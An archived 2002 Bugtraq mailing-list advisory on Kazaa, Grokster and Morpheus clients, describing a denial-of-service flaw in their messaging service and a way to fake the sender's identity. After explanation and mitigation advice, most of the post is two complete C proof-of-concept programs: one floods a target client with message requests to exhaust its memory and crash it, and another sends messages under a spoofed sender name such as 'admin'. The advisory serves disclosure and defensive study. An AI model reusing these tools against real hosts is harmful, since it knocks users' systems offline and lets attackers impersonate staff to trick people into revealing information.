Home page logo
/

bugtraq logo Bugtraq mailing list archives

Morpheus, Kazaa and Grokster Remote DoS. Also Identity faking vulnerability.
From: mrjade 2k2 <mrjade () softhome net>
Date: Fri, 22 Feb 2002 03:38:53 +0000


Kazaa, grokster and morpheus remote denial of service. 'P2p' fasttrack's
technology vulnerable. Also identity can be faked in message service.


Summary
---------------------
    There's a remote denial of service in fasttrack person-to-person technology,
    used by kazaa, grokster and morpheus that can allow an attacker to 
    crash kazaa's service and also hang the machine. 

    In the same service, identity can be faked by a malicious attacker to involve
    remote user in desired operations.


Version Affected
---------------------
    For Denial of service:
    kazaa, grokster and morpheus clients for windows version 1.3.3. (not 
    tested, but any version with client-to-client message feature are vulnerable).
    All the software that uses person-to-person technology with message service 
    support (prior to kazaa 1.5) from fasttrack is vulnerable at this moment. 

    For indentity faking:
    kazaa, grokster and morpheus clients for windows all version to this date, 
    including updated version of kazaa 1.5. 


Denial of service impact
------------------------
    Through sending a couple of messages, remote system can be exhausted 
    because of the consuming of resources.    


Explanation
---------------------
    I'm going to reffer to kazaa as main target, because is the first that imports
    p2p technology from fasttrack.

    Kazaa's client opens a pop up window everytime a message is received and
    sender username isn't ignored. However, available memory isn't checked at
    all, so system will be exhausted when no more RAM can be reserved for 
    a new pop up window. System out of memory will hang or become unstable 
    and kazaa's process will crash, lossing all openned downloaded data untill
    that moment. Usually a reboot will be needed to restore system.

    Kazaa's client uses the HTTP protocol for sending requests betwen users. 
    All data but download data are sent as tags in the http header, using a very 
    simple GET request.

    For the message request, this can be an example of http header:
    (conected to port 1214 on remote host, data is snort result)

    02/08-19:10:27.113857 0:E0:4C:E1:22:CD -> 0:4F:49:6:F5:1E type:0x800 len:0x197
    192.168.0.3:3337 -> 66.56.77.172:1486 TCP TTL:128 TOS:0x0 ID:30781  DF
    ***PA* Seq: 0x86CC6D   Ack: 0x8BB6E89   Win: 0x2238
    47 45 54 20 2F 2E 6D 65 73 73 61 67 65 20 48 54  GET /.message HT
    54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 36 36  TP/1.1..Host: 66
    2E 35 36 2E 37 37 2E 31 37 32 3A 31 34 38 36 0D  .56.77.172:1486.
    0A 55 73 65 72 41 67 65 6E 74 3A 20 4B 61 7A 61  .UserAgent: Kaza
    61 43 6C 69 65 6E 74 20 41 75 67 20 32 39 20 32  aClient Aug 29 2
    30 30 31 20 31 39 3A 34 32 3A 34 36 0D 0A 58 2D  001 19:42:46..X-
    4B 61 7A 61 61 2D 55 73 65 72 6E 61 6D 65 3A 20  Kazaa-Username: 
    ?? ?? ?? ?? ?? ?? 64 0D 0A 58 2D 4B 61 7A 61 61  ???????..X-Kazaa
    2D 4E 65 74 77 6F 72 6B 3A 20 3F 3F 3F 0D 0A 58  -Network: ???..X
    2D 4B 61 7A 61 61 2D 49 50 3A 20 31 39 32 2E 31  -Kazaa-IP: 192.1
    36 38 2E 30 2E 33 3A 31 32 31 34 0D 0A 58 2D 4B  68.0.3:1214..X-K
    61 7A 61 61 2D 53 75 70 65 72 6E 6F 64 65 49 50  azaa-SupernodeIP
    3A 20 32 30 ?? 2E 32 ?? 38 2E ?? ?? ?? ?? ?? ??  : 20?.21?.2?.17?
    3A 31 32 31 34 0D 0A 43 6F 6E 6E 65 63 74 69 6F  :1214..Connectio
    6E 3A 20 63 6C 6F 73 65 0D 0A 58 2D 4B 61 7A 61  n: close..X-Kaza
    61 2D 49 4D 54 6F 3A 20 ?? ?? ?? ?? ?? ?? ?? ??  a-IMTo: ????????
    ?? ?? 40 4B 61 5A 61 41 0D 0A 58 2D 4B 61 7A 61  ?? () KaZaA  X-Kaza
    61 2D 49 4D 54 79 70 65 3A 20 75 73 65 72 5F 74  a-IMType: user_t
    65 78 74 0D 0A 58 2D 4B 61 7A 61 61 2D 49 4D 44  ext..X-Kazaa-IMD
    61 74 61 3A 20 ?? ?? ?? ?? ?? ?? ?? ?? 61 57 35  ata: ???????????
    70 63 32 68 70 ?? ?? ?? ?? ?? ?? ?? ?? 49 47 52  ????????????????
    76 64 32 35 73 ?? ?? ?? ?? ?? ?? ?? ?? 0D 0A 0D  ???????????==...
    0A                                               .

    In a readable format and completed:

    GET /.message HTTP/1.1                      | message request.
    Host: 192.168.0.3:1214                      | remote host ip.
    UserAgent: KazaaClient Aug 29 2001 19:42:46 | 
    X-Kazaa-Username: attacker                  | Username () Network is attacker.
    X-Kazaa-Network: mydomain                   | kazaa's username. can be faked.
    X-Kazaa-IP: 192.168.0.1:1214                | Our ip for client answer
    X-Kazaa-SupernodeIP: 20?.21?.2?.17?:1214    | 
    Connection: close                           | 
    X-Kazaa-IMTo: victim () KaZaA                  | To, it must be victim's username
    X-Kazaa-IMType: user_text                   | or popup wont open.
    X-Kazaa-IMData: ????????????????            | Radix 64 encoded message.

    Requiered fields for a complete HTTP/1.1 request in order to kazaa accepting
    the message are:

    GET /.message HTTP/1.1         | message request.
    X-Kazaa-Username: ???????      | From who the message was sent.
    X-Kazaa-Network: ???????       | 
    X-Kazaa-IMTo: victim           | victim's username (only username).
    X-Kazaa-IMType: user_text      | type of data.
    X-Kazaa-IMData: ????????       | encoded message.

    Remote's username must be correct to pop up message window, and kazaa's client
    will show remote's username on any tcp connection to port 1214 (security matter?).

    It's simple to send an amount of HTTP requests to kazaa's clients with diferent
    attacker's username and domain to avoid ignoring option. Remote client can be
    attacked even if they are not connected to kazaa's network or logged in.

    No xploit is needed to do he trick. Just a client of kazaa can do if remote user
    isn't able to stop the incoming messages.


Other
---------------------
    In fact, kazaa's message sytem can be used for malicious purposes as sender
    identity can be easily faked. Using kazaa.com as attacker network and supporting
    usernames as admin, security and so, users can be confused to expose relevant 
    information in private messages. 
    The response to the message can be cached just listening on port 1214 and decoding
    X-Kazaa-IMData using radix64 algorithm.


Solution
---------------------
    The vendors have been notified of the problem before the general public helping in
    the research for this advisorie. Kazaa version 1.5 can be downloaded and fasttrack 
    ensure a repaired message service.

    As it only affects message system, ignoring all received message is the 
    fastest and really solution while waiting vendor's solution. So, in the
    application menu, tools, options, messages, mark the 'ignore all messages'
    check box.

    As attacker can modify sender information (username () domain) trying to ignore
    all 'attacker''s username is imposible, as it can be radom generated.    

    Also, for identity faking, no operations are taken. Kazaa's private messages 
    sometimes must be ignored, considering other ways to contact for administrative
    purposes from kazaa, grokster and morpheus staff. For increasing security, 
    kazaa's username must not be given on any tcp connection but only from
    kazaa's supernodes, and a better encryption algorithm is recommended.


Acknowledgements
---------------------
    Both bugs discovered my mrjade, are tested and demostration code is available 
    in this paper.


Contact Information
---------------------
    mrjade () softhome net

    This adv is also available at:

    http://www.hackindex.org/kazaa.htm
  
    Sources available at:

    http://www.hackindex.org/download/kazaa-xploit.c
    http://www.hackindex.org/download/kazaa-msg.c


Disclaimer
---------------------
    This advisory does not claim to be complete or intended to malicious
    purposes. Supplied exploit code is to be used as demostration of bug
    or educational purposes only.

    This advisory was written for open distribution in unmodified form.
    Articles that are based on information from this advisory should include
    link or credits note.


credits
----------------------
    Thanks to fasttrack staff for supporting and help on researching this,
    spanish people in the net.. and people near me, specialy the one who 
    encourages me.


Demostration code
---------------------

   These two programs demostrate both of the security matters in the software.
   Kazaa-xploit.c will send a couple of messages to a host/ip using kazaa, 
                  grokster or morpheus software trying to crash it.

   Kazaa-msg.c    will send a message to a host/ip using kazaa, grokster or 
                  morpheus faking the identity of sender.




/* kazaa-xploit.c code Begin Of File ------------------------------------------
 *
 * Filename : kazaa-xploit.c
 * Version  : 0.1
 * Coder(s) : mrjade [WkT!] <mrjade () softhome net>
 * Date     : 9/2/2K2 
 * Abstract : Send X messages to any kazaa, grokster and morpheus client
 *            version 1.3.3 for windows exhausting the system. 
 *
 * Compile: #gcc -o kazaa-xploit kazaa-exploit.c
 * Usage:   #./kazaa-xploit host/ip nmessages
 * Example: #./kazaa-xploit 192.168.0.5 1000
 * 
 * This will send 1000 messages to given kazaa client.
 * proof of concept for the same advisorie. Source code
 * extracted from kazaa-msg.c program written by mrjade, for
 * sending readable messages to any kazaa user.
 * 
 * License conditions:
 *
 * Copyright (c) 2002 mrjade - <mrjade () softhome net>
 * 
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 * NOTES: 
 * Improves of this code can generate diferent id () domain names for
 * each connection.
 *
 * For 300mb of RAM 1000 messages will be a good example.
 */

/*  ---== Include section ==---                         */

#include <netdb.h>
#include <arpa/inet.h>
 
#include <stdio.h>  /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */
 
/*  ---== Defines section ==---                         */

/* kazaa-head id, dominio, to */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: aaa\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "user"              /* Default id for sending msg */
#define minetwork "domain.com"  /* Default id for sending msg */
#define PORT 1214               /* Default port for sending data */

/*  ---== Procedure section ==---                        */

/* Usage Banner..*/
void usage(char *pname) {
  printf (" :: Usage : %s ip/host n_messages\n", pname);
  printf (" :: 1000 for 300mb of RAM aprox.\n", pname);
  fflush (stdout);
  exit(-1);
}

/* Resolv hostname */

unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;

  if((addr.s_addr = inet_addr(host)) == -1) {
        printf(" :: Resolving host: %s\n", host);       
        if(!(host_ent = gethostbyname(host))) return(0);
        memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  } return(addr.s_addr);
}


char *get_token (char *buffer, char *token){
char *stri, *strf;

  if ((stri = strstr (buffer, token))){
        stri = stri + strlen(token);
        strf = strchr (stri, 0xA);
        strf[-1]= 0;
  } else {
        return (NULL);
  }
  return (stri);
}

/*  ---== MAIN Procedure ==---                           */

int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id;           /* user_name = id = remote user name */
char *user_net, *network;       /* user_net = network = remote user network */
char buffer[512];               /* Rec. buffer*/
int a=0;

        printf("\n :: xploit code for kazaa, morpheus and grokster users..");
        printf("\n :: (C)2002 mrjade [WkT!]          <mrjade () softhome net>\n");

        if( argc < 3) {
                usage( argv[0] );
        }
        
        /* Host resolv and connect */
        host = argv[1];
        TheHoSt.sin_family = AF_INET;
        TheHoSt.sin_addr.s_addr = resol(host);
        if(!TheHoSt.sin_addr.s_addr) {
                printf(" :: ERROR: host not found.\n\n");
                exit(-1);
        }
        
        /* We must get remote user name, need it to send any request */
        TheHoSt.sin_port = htons(PORT);
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
                printf(" :: ERROR: Can't open socket\n\n");
                exit(-1);
        }
        bzero(buffer,sizeof(buffer));   
        if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

                printf(" ::\n :: Getting username () network: "); fflush(stdout);
        
                /* Search for username () userdomiain on host */
                send(sock,http_basic,strlen(http_basic),0);
                recv(sock,buffer,sizeof(buffer),0);
                close(sock);

                if ((user_net = get_token(buffer, "Network: ")) && \
                    (user_name = get_token(buffer, "Username: "))){
                        printf ("%s () %s\n", user_name, user_net); 
                        fflush (stdout);
                } else {
                        printf ("ERR\n :: No username or network detected\n\n");
                        fflush (stdout);
                        exit (-1);
                }

                /* Storing strings */
                network  = malloc (strlen(user_net)+1);
                bzero (network, strlen(user_net)+1);
                memcpy (network, user_net, strlen(user_net));

                id  = malloc (strlen(user_name)+1);
                bzero (id, strlen(user_name)+1);
                memcpy (id, user_name, strlen(user_name));
        } else {
                printf(" :: ERR Can't connect.\n\n");
                fflush(stdout);
                exit (-1);
        }

        /* number of msg to send*/
        cont = strtol (argv[argc-1],0,10);
        if (cont < 1){
                cont= 1000;
        } 
        printf(" :: Sending %d messages:\n", cont);
        fflush(stdout);
                
        
        /* create HTTP request */
        c_ = strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+3;
        btmp = malloc( c_);
        bzero(btmp, c_);
        sprintf (btmp, kazaa_head, id_, minetwork,  id);

        
        
        /* Bucle */
        for (a=0; a < cont; a++){
        
        /* Now send the message request */              
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
                printf(" :: ERROR: Can't open socket\n\n");
                exit(-1);
        }
        
        printf(".");fflush(stdout);
        bzero(buffer,sizeof(buffer));   
        if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
                send(sock,btmp,strlen(btmp),0);
                recv(sock,buffer,sizeof(buffer),0);
                if (strstr(buffer, "200")){ // HTTP OK 
                        printf(".");fflush(stdout);
                } else {
                        printf("\n :: Can't deliver message. \n\n");fflush(stdout);
                        close(sock); 
                        exit(-1);
                }
                bzero(buffer,sizeof(buffer)); //Clear Buffer    
        } else {
                close(sock); 
                printf("\n :: Can't connect. Service down \n\n");
                exit(-1);
        }
        close (sock);
    } /* for */
    return (0);
}
/* End Of File -----------------------------------------------------------------------*/



/* kazaa-msg.c code Begin Of File ------------------------------------------------------
 *
 * Filename : kazaa-msg.c
 * Version  : 0.1
 * Coder(s) : mrjade [WkT!] <mrjade () softhome net>
 * Date     : 9/2/2K2 
 * Abstract : Send a message to any kazaa, grokster and morpheus user,
 *            knowing their ip/hostname. Programmed for hackindex team.
 *            http://www.hackindex.com
 *
 * Compile: #gcc -o kazaa-msg kazaa-msg.c
 * 
 * Usage: #./kazaa-msg host/ip message
 * 
 * Example: #./kazaa-msg 192.168.0.5 Hey.. i can send you a message..
 * 
 * This will send a message to given kazaa user (host). Actually this is 
 * just a proof of concept. requiered fields for send a message are:
 *
 * X-Kazaa-Username
 * X-Kazaa-Network 
 *
 *  These will form the "FROM" : name () network
 *  modify the id_ and minetwork defines to change "FROM" field.
 * 
 * X-Kazaa-IMTo                  "TO" field. Remote kazaa's login
 *                                (kazaa, grokster, morpheus) 
 *                                It's retrieved from a first connection to 
 *                                host.
 * X-Kazaa-IMType user_text       Type of data (fixed)
 * X-Kazaa-IMData                 Message radix64 encoded.
 * 
 * For grokster (tested) and morpheus (not tested) the name of the fields
 * in the HTTP header are the same.
 * 
 * If you want to receive any answer from the remote user, you must open 
 * a tcp socket listening on port 1214. HTTP header will be the same, and
 * message must be decoded using Radix64 algorithm.
 * 
 * License conditions:
 *
 * Copyright (c) 2002 mrjade - <mrjade () softhome net>
 * 
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 *
 * Other Copyright: 
 * 
 * radix64 encode table and enc64() by Carl M. Ellison *
 *
 * NOTES: 
 * Not tested at all.. it my be bugged.
 */

/*  ---== Include section ==---                         */

#include <netdb.h>
#include <arpa/inet.h>
 
#include <stdio.h>  /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */
 
/*  ---== Defines section ==---                         */

/* kazaa-head id, dominio, to, msg-radix64 */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
Host: localhost\n\
UserAgent: KazaaClient Aug 29 2001 19:42:46\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
Connection: close\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: %s\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "admin"             /* Default id for sending msg */
#define minetwork "hackindex"   /* Default id for sending msg */
#define PORT 1214               /* Default port for sending data */

/*  ---== Global variables ==---                         */


char enctab[64] = {             /* radix64 encoding table */
  'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
  'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
  'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
  'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' 
}; 

/*  ---== Procedure section ==---                        */

/* Usage Banner..*/
void usage(char *pname) {
  printf (" :: Usage : %s ip/host mensaje\n", pname);
  fflush (stdout);
  exit(-1);
}

/* Resolv hostname */
unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;

  if((addr.s_addr = inet_addr(host)) == -1) {
        printf(" :: Resolving host: %s\n", host);       
        if(!(host_ent = gethostbyname(host))) return(0);
        memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  } return(addr.s_addr);
}


char *get_token (char *buffer, char *token){
char *stri, *strf;

  if ((stri = strstr (buffer, token))){
        stri = stri + strlen(token);
        strf = strchr (stri, 0xA);
        strf[-1]= 0;
  } else {
        return (NULL);
  }
  return (stri);
}


void enc64( outbuff, out_lth, polth, inbuff, inb_lth, line_lth, n_space )
char *outbuff ;                 /* output buffer */
long out_lth ;                  /* allocated length of the output buffer */
long *polth ;                   /* actual length of output */
unsigned char *inbuff ;         /* input (binary) buffer */
long inb_lth ;                  /* length of inbuff */
long line_lth ;                 /* maximum line lth (-1 means infinite) */
long n_space ;                  /* # spaces at start of each text line */
{
  long nl ;                     /* # chars left in this line */
  char *b, *c ;                 /* walking pointers */

  nl = line_lth ;
  b = inbuff ;
  c = outbuff ;

  while (  (inb_lth > 0)
         &&(out_lth > 5) ) {
    /* encoding */
    c[0]=enctab[(b[0]>>2)&0x3f] ;
    c[1]=enctab[((b[0]&0x3)<<4)|((b[1]>>4)&0xf)] ;
    c[2]=enctab[((b[1]&0xf)<<2)|((b[2]>>6)&0x3)] ;
    c[3]=enctab[b[2]&0x3f] ;
    out_lth -= 4 ;              /* count the code bytes */
    switch (inb_lth) {          /* take care of the final bytes */
    case 1: c[2]='=' ;          /* only 1, so == */
    case 2: c[3]='=' ;          /* 2, so = */
      inb_lth = 0 ;             /* either way, we're done */
      c += 4 ;                  /* but no spaces */
      *(c++) = '\n' ;           /* and there's an end of line */
      break ;

    default:
      inb_lth -= 3;
      b += 3 ;
      c += 4 ;
      nl -= 4 ;
      if (nl <= 0) {
        long i ;
        *(c++) = '\n' ;
        nl = line_lth ;
        for (i=0;i<n_space;i++)
          *(c++) = ' ' ;
        out_lth -= 1 + n_space ;
      }
      break ;
    } /* switch */
  } /* while */
  *polth = c - outbuff ;
} /* enc64 */

/*  ---== MAIN Procedure ==---                           */

int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id;           /* user_name = id = remote user name */
char *user_net, *network;       /* user_net = network = remote user network */
char *msg, *msgr64;             /* Radix 64 stuf */
long olth;                      /* Radix 64 stuf */
char buffer[512];               /* Rec. buffer*/

        printf("\n :: Message sending 4 kazaa, morpheus and grokster users..");
        printf("\n :: (C)2002 mrjade [WkT!]            <mrjade () softhome net>\n");

        if( argc < 3) {
                usage( argv[0] );
        }
        
        /* Host resolv and connect */
        host = argv[1];
        TheHoSt.sin_family = AF_INET;
        TheHoSt.sin_addr.s_addr = resol(host);
        if(!TheHoSt.sin_addr.s_addr) {
                printf(" :: ERROR: host not found.\n\n");
                exit(-1);
        }
        
        /* We must get remote user name, need it to send any request */
        TheHoSt.sin_port = htons(PORT);
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
                printf(" :: ERROR: Can't open socket\n\n");
                exit(-1);
        }
        bzero(buffer,sizeof(buffer));   
        if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

                printf(" ::\n :: Getting username () network: "); fflush(stdout);
        
                /* Search for username () userdomiain on host */
                send(sock,http_basic,strlen(http_basic),0);
                recv(sock,buffer,sizeof(buffer),0);
                close(sock);

                if ((user_net = get_token(buffer, "Network: ")) && (user_name = get_token(buffer, "Username: "))){
                        printf ("%s () %s\n", user_name, user_net); fflush (stdout);
                } else {
                        printf ("ERR\n :: No username or network detected\n\n"); fflush (stdout);
                        exit (-1);
                }

                /* Storing strings */
                network  = malloc (strlen(user_net)+1);
                bzero (network, strlen(user_net)+1);
                memcpy (network, user_net, strlen(user_net));

                id  = malloc (strlen(user_name)+1);
                bzero (id, strlen(user_name)+1);
                memcpy (id, user_name, strlen(user_name));
        } else {
                printf(" :: ERROR: Can't connect\n\n"); fflush(stdout);
                exit (-1);
        }

        
        /* Now send the message request */              
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
                printf(" :: ERROR: Can't open socket\n\n");
                exit(-1);
        }
        bzero(buffer,sizeof(buffer));   
        if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
        
                printf(" :: Sending message to %s from %s () %s\n", id, id_, minetwork);fflush(stdout);

                /* Get msg length */
                cont=2; c_=0;
                while (cont < argc){
                        c_ = c_ + strlen(argv[cont++])+1; 
                }
                
                /* Allocate buffer */
                msg = malloc (c_);              
                bzero (msg, c_);
                
                /* Store msg in buffer */
                cont=2;
                while (cont < argc){
                        strcat(msg,argv[cont]);
                        strcat(msg, " ");
                        cont++;
                }
                msg[strlen(msg)]=0;

                /* Output buffer for radix64 conv */
                msgr64 = malloc (2*c_);         
                bzero (msgr64, 2*c_);
                
                /* Convert msg to radix 64 */
                enc64( msgr64, 2*c_, &olth, msg, c_, 9999, 0 );

                /* Store in buffer */
                c_ = strlen (msgr64)+strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+3;
                btmp = malloc(c_);
                bzero(btmp, c_);
                sprintf (btmp, kazaa_head, id_, minetwork,  id,  msgr64);
                send(sock,btmp,strlen(btmp),0);
                        while ((recv(sock,buffer,sizeof(buffer),0)!=-1) && (buffer[0] !=0)){
                                if (strstr(buffer, "200")){ // HTTP OK 
                                        printf(" :: Message sent.\n\n");
                                        close(sock);
                                        exit(0);
                                        }
                                bzero(buffer,sizeof(buffer)); //Clear Buffer                            
                                }

                        printf(" :: Can't deliver message\n\n\n\n");
        } else {
                close(sock); 
                printf(" :: Can't connect. Service unavailable.\n\n");
                exit(-1);
        }
        close(sock);  //Remote host will close it when finished
        return (-1);
}

/* End Of File ----------------------------------------------------------------------------*/







  By Date           By Thread  

Current thread:
  • Morpheus, Kazaa and Grokster Remote DoS. Also Identity faking vulnerability. mrjade 2k2 (Feb 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault